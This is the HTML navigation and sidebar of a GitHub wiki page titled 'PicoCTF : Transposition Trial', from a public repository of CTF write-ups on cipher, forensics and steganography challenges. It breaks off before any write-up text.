aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> </div> </label></form> </div></div> </div> <div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div> Sign up </div> </div> </div> </div></header> </div> <div id="start-of-content" class="show-on-focus"></div> <div id="js-flash-container" data-turbo-replace> <template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div> </div> </div></div> </template></div> <include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment> <div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" > <div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace> <div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;"> <div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> not1cyyy </span> <span>/</span> CTF-Writeups <span></span><span>Public</span> </div> </div> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>0</span> <div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>7</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div> </div> <div id="responsive-meta-container" data-turbo-replace></div> <nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-book UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75A.75.75 0 0 1 .75 1h4.253c1.227 0 2.317.59 3 1.501A3.743 3.743 0 0 1 11.006 1h4.245a.75.75 0 0 1 .75.75v10.5a.75.75 0 0 1-.75.75h-4.507a2.25 2.25 0 0 0-1.591.659l-.622.621a.75.75 0 0 1-1.06 0l-.622-.621A2.25 2.25 0 0 0 5.258 13H.75a.75.75 0 0 1-.75-.75Zm7.251 10.324.004-5.073-.002-2.253A2.25 2.25 0 0 0 5.003 2.5H1.5v9h3.757a3.75 3.75 0 0 1 1.994.574ZM8.755 4.75l-.004 7.322a3.752 3.752 0 0 1 1.992-.572H14.5v-9h-3.495a2.25 2.25 0 0 0-2.25 2.25Z"></path></svg> <span>Wiki</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/not1cyyy/CTF-Writeups/security/overall-count" accept="text/fragment+html"></include-fragment> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span> <div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Wiki Security Insights </details-menu></details></div></nav> </div> <turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " > <div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4 page" id="wiki-wrapper"> <div class="d-flex flex-column flex-md-row gh-header"> <h1 class="flex-auto min-width-0 mb-2 mb-md-0 mr-0 mr-md-2 gh-header-title">PicoCTF : Transposition Trial</h1> <div class="mt-0 mt-lg-1 flex-shrink-0 gh-header-actions"> Jump to bottom </div> </div> <div class="mt-2 mt-md-1 pb-3 gh-header-meta"> Firas Chaib edited this page <relative-time datetime="2022-04-18T01:21:10Z" class="no-wrap">Apr 18, 2022</relative-time> · 1 revision </div> <div id="wiki-content" class="mt-4"> <div data-view-component="true" class="Layout Layout--flowRow-until-md Layout--sidebarPosition-end Layout--sidebarPosition-flowRow-end"> <div data-view-component="true" class="Layout-sidebar"> <div class="wiki-rightbar"> <div id="wiki-pages-box" class="mb-4 wiki-pages-box js-wiki-pages-box" role="navigation"> <div class="Box Box--condensed color-shadow-small"> <div class="Box-header js-wiki-toggle-collapse" style="cursor: pointer"> <h3 class="Box-title"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toggle-display"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-right js-wiki-sidebar-toggle-display d-none"> <path d="m6.427 4.427 3.396 3.396a.25.25 0 0 1 0 .354l-3.396 3.396A.25.25 0 0 1 6 11.396V4.604a.25.25 0 0 1 .427-.177Z"></path></svg> Pages <span>14</span> </h3> </div> <div class=" js-wiki-sidebar-toggle-display"> <div class="filter-bar"> <input type="text" id="wiki-pages-filter" class="form-control input-sm input-block js-filterable-field" placeholder="Find a page…" aria-label="Find a page…"> </div> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Home</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Home/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> GDG Algiers CTF : franklin last words</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/GDG-Algiers-CTF-:-franklin-last-words/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PatriotCTF : Banner</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PatriotCTF-:-Banner/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PatriotCTF : CoruptAAAAd</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PatriotCTF-:-CoruptAAAAd/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : Eavesdrop</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-Eavesdrop/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : Operation Oni</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-Operation-Oni/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : Sleuthkit Apprentice</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-Sleuthkit-Apprentice/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : st3g0</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-st3g0/_toc"> </include-fragment></details> <details class="details-reset" open> <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron js-wiki-sidebar-toc-toggle-chevron-open mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : Transposition Trial</span> </div> </summary> Description Files Solution Recon Execution Flag </details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 